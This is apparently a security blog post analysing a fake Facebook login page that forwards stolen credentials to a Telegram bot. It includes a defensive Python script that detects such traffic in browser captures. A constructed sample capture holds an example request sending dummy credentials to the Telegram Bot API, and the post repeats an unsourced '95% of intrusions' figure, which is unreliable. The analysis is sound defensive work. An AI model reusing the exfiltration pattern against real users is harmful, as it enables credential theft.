Analysis of a Facebook Phishing Page

Threat actors often use phishing attacks to deliver a payload for initial access or to steal credentials from individuals or an organization's network. These attacks usually involve sending phishing emails designed to deceive the target.

So, what is a phishing email?

Phishing is a type of social engineering attack in which the threat actor attempts to manipulate the victim into logging into a fake (scam) webpage to capture their credentials. A common example is a fake Facebook login page, which looks legitimate but is actually designed to steal login information.

Our example is based on a similar phishing page, as shown in the screenshot below.

Phishing attacks are responsible for approximately 95% of cyber intrusions. That is a striking figure, but it is not an exaggeration; it comes from real data, not something made up.


So the threat actor deploys a fake Facebook login page to trick users into entering their own credentials. But where does that stolen data go?

In the case of the scam page analyzed in this blog post, the stolen credentials are exfiltrated to the threat actor via a Telegram bot. As shown in the screenshot below, the phishing page is configured to send the captured data directly to the attacker’s Telegram account in real time.


Now, let’s try entering some dummy credentials and inspect the process using the browser's developer tools. We'll open the Inspect Element panel, go to the Network tab, and observe where the data (specifically, the credentials) is being sent.
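The same inspection can be automated for triage. The script below is an added example written for this post, not code from the phishing kit or from the original article: it takes a list of captured HTTP requests in a simplified HAR-like form (the `method`, `url`, `postData` and `referer` keys are an assumption about how the capture was exported) and flags any request to the Telegram Bot API, which has the well-known shape `https://api.telegram.org/bot<token>/<method>`. For each hit it records the Bot API method, the `chat_id` that receives the message, and which credential-looking labels appear in the exfiltrated `text`, while deliberately dropping the secret half of the bot token so the report can be shared without preserving a usable credential. The sample capture is constructed, with placeholder hostnames and a fake token.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Telegram Bot API endpoint shape: https://api.telegram.org/bot<bot_id>:<secret>/<apiMethod>
TELEGRAM_BOT_API = re.compile(
    r"^https?://api\.telegram\.org/bot(?P<bot_id>\d+):(?P<secret>[A-Za-z0-9_-]+)/(?P<api_method>[A-Za-z]+)"
)

# Labels that phishing kits typically put in front of stolen values (constructed list)
CREDENTIAL_LABELS = {"email", "user", "username", "login", "pass", "password", "passwd"}


def _params(entry):
    """Merge query-string and form-encoded body parameters into one dict (first value wins)."""
    parts = urlsplit(entry["url"])
    params = {k: v[0] for k, v in parse_qs(parts.query).items()}
    body = entry.get("postData") or ""
    if body:
        params.update({k: v[0] for k, v in parse_qs(body).items()})
    return params


def analyze_request(entry):
    """Return a finding for a captured request that talks to the Telegram Bot API, else None."""
    m = TELEGRAM_BOT_API.match(entry["url"])
    if not m:
        return None
    params = _params(entry)
    # The stolen data is normally carried in the Bot API 'text' parameter
    message = params.get("text", "")
    leaked = sorted(
        label for label in CREDENTIAL_LABELS
        if re.search(rf"\b{label}\b", message, re.IGNORECASE)
    )
    return {
        "api_method": m.group("api_method"),
        "http_method": entry["method"],
        "bot_id": m.group("bot_id"),      # numeric half only; the secret is intentionally not kept
        "chat_id": params.get("chat_id"),  # the attacker's receiving chat
        "leaked_fields": leaked,
        "referer": entry.get("referer"),  # the page that triggered the exfiltration
    }


def find_telegram_exfil(entries):
    """Run analyze_request over a whole capture and keep only the hits."""
    return [f for f in (analyze_request(e) for e in entries) if f]


# Constructed sample capture: a benign asset load, the fake login form submission,
# and the kit forwarding the captured credentials to a Telegram bot (fake token).
SAMPLE_CAPTURE = [
    {"method": "GET", "url": "https://phish-login.example/assets/fb-style.css",
     "postData": None, "referer": "https://phish-login.example/"},
    {"method": "POST", "url": "https://phish-login.example/login.php",
     "postData": "email=test%40example.com&pass=dummy123",
     "referer": "https://phish-login.example/"},
    {"method": "POST",
     "url": "https://api.telegram.org/bot1234567890:AAExampleTokenNotReal/sendMessage",
     "postData": "chat_id=987654321&text=Email%3A+test%40example.com%0APassword%3A+dummy123",
     "referer": "https://phish-login.example/login.php"},
]

if __name__ == "__main__":
    for finding in find_telegram_exfil(SAMPLE_CAPTURE):
        print(finding)
```

In practice you would feed the function the entries exported from the Network tab (Save all as HAR) after mapping them onto the four keys above; the `bot_id` and `chat_id` values are what you would pivot on to link several phishing pages to the same operator.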
